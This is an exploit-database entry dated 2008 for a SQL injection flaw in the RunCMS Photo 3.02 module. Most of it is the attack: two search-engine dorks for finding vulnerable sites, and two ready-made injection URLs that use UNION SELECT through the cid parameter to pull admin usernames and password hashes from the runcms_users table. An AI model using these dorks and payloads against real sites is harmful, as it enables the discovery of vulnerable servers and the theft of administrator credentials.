id: 2761
date: 03/21/2008
title: RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability
=================================================================




##########################################
#
# RunCMS Module Photo 3.02 SQL injection
#
###########################################
#
# DORK 1 : allinurl: "modules/photo/viewcat.php?id"
#
# DORK 2 : inurl:photo "powered by runcms"
#
###########################################
EXPLOIT :

admin

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

###########################################
RunCMS Photo Version : 3.02 module. #
###########################################



#  0day.today [2023-03-26]  #